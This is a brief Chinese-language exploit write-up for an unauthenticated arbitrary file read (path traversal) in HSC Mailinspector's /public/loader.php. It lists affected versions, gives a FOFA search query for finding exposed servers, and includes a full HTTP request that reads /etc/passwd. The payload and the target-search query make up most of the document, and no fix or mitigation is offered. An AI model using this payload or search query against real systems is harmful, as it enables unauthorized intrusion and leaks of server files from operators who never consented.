H35-1HSC-Mailinspector-任意文件读取
漏洞描述:
由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。
影响版本:
HSC Mailinspector 5.2.17-3 through 5.2.18
网站图片:
fofa语法:
body=“mailinspector/public”
漏洞复现:
payload:
GET /mailinspector/public/loader.php?path=./././/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
效果图: